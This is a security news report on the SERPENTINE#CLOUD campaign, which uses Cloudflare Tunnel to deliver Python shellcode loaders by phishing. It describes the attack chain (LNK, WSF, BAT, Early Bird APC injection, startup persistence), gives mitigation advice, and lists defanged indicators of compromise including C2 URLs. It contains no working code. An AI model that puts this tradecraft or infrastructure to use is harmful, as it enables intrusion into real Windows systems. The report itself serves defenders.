A sophisticated malware campaign, tracked as SERPENTINE#CLOUD, has been observed leveraging Cloudflare Tunnel infrastructure to orchestrate a complex Python-based attack against Windows systems.
First detected in attacks targeting the US, UK, Germany, and other regions across Europe and Asia, the campaign illustrates the growing trend of threat actors exploiting trusted cloud services for payload delivery and command-and-control (C2) operations.
Cloud Infrastructure Shields
The infection typically begins through phishing emails that contain links to zipped files masquerading as invoices or payment documents.
Once unpacked, the victim encounters a malicious Windows shortcut (.lnk) file, disguised as a document and adorned with a PDF icon, hiding its true extension and intent.
Upon execution, this shortcut uses native Windows tools, such as cmd.exe and robocopy, to silently retrieve malicious scripts from remote servers hosted behind ephemeral Cloudflare Tunnel (trycloudflare[.]com) subdomains, using encrypted WebDAV over HTTPS.
This cloud-based obfuscation makes detection and takedown efforts significantly more challenging, allowing the threat actors to remain anonymous and evade traditional security products.
According to Securonix Report, the attack chain is markedly multi-staged and modular. Following initial access, the .lnk file downloads and launches a Windows Script File (.wsf), itself acting as a loader to fetch an obfuscated batch script (.bat) from another Cloudflare-protected location.
This batch script is heavily obfuscated both at the encoding and logical levels to resist reverse engineering.
It performs checks for antivirus software, deploys decoy PDFs to distract users, and downloads a ZIP archive containing its Python malware toolkit.
The malicious ZIP archive holds not only the portable Python runtime but also a suite of Python scripts.
Once extracted, the batch file executes several Python payloads designed to load and inject shellcode directly into memory, bypassing disk-based detection methods.
One notable Python script (run.py) employs Early Bird APC (Asynchronous Procedure Calls) injection a sophisticated technique that injects shellcode into a newly spawned process (e.g., notepad.exe) before it begins normal execution, further complicating detection by endpoint security solutions.
Obfuscation Tactics Facilitate Stealthy Remote Access
Payload analysis revealed the use of tools like Donut (an in-memory .NET/PE loader) and the Kramer obfuscator for Python, heightening the difficulty of both static and dynamic analysis.
These tools enable the attackers to deliver and execute .NET assemblies or other Portable Executable payloads solely in memory, leaving minimal forensic traces.
The Python shellcode loaders utilize RC4 encryption and custom XOR keys for payload decryption, and exploit Python’s ctypes module to interface directly with the Windows API.
Persistence on the victim system is achieved by dropping and registering additional scripts and batch files into the Windows startup directory, ensuring the attack chain is relaunched on every user login.
The malware takes evasion a step further with simple scripts that keep the machine active, preventing system idle or sleep states that might interrupt execution or facilitate detection.
Cloudflare Tunnel’s legitimate use commonly as a development tool for exposing local services provides an ideal staging ground for temporary, disposable malicious infrastructure.
The tunnel traffic is SSL/TLS encrypted, fronted by Cloudflare’s global CDN, and rarely blocked or flagged by enterprise security products due to its association with a highly reputable service.
To mitigate such threats, organizations are urged to educate users about phishing risks, enable file extension visibility, monitor for script and unusual process execution in user directories (such as %HOME%\Contacts), and closely inspect network traffic to development-centric domains like trycloudflare[.]com.
Detection strategies should also incorporate behavioral indicators related to script execution, process injection, and anomalous persistence mechanisms.
While attribution remains uncertain, the campaign’s sophistication, use of English-language code comments, and focus on Western organizations indicate an advanced actor refining scalable infection vectors under the cover of legitimate cloud infrastructure.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| Domains | nhvncpure[.]shop, nhvncpure[.]sbs, nhvncpure[.]click, nhvncpurekfl.duckdns[.]org, twilightparadox[.]com, strangled[.]net, mooo[.]com, nhvncpure.duckdns[.]org, etc. |
| IP Addresses | 51.89.212[.]145, 192.169.69[.]26 |
| Cloudflare Subdomains | flour-riding-merit-refers.trycloudflare[.]com, depot-arrange-zero-kai.trycloudflare[.]com, eastern-instructional-ant-jungle.trycloudflare[.]com, others |
| File Names | RE_05FSKBSAXZ25A.pdf.lnk, tank.wsf, kiki.bat, cam.zip, FTSP.zip, run.py, Jun02_an.py, Okwan1.py, Wsandy1.py, pws1.vbs, PWS.vbs, startuppp.bat |
| Hashes (SHA256) | 193218243C54D7903C65F5E7BE9B865DDB286DA9005C69E6E955E31EC3EFA1A7, 3CF0E84EA719B026AA6EF04EE7396974AEB3EC3480823FD0BB1867043C6D2BF9, etc. |
| C2 URLs | hxxps://flour-riding-merit-refers.trycloudflare[.]com, hxxps://depot-arrange-zero-kai.trycloudflare[.]com, hxxps://eastern-instructional-ant-jungle.trycloudflare[.]com/cam.zip |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
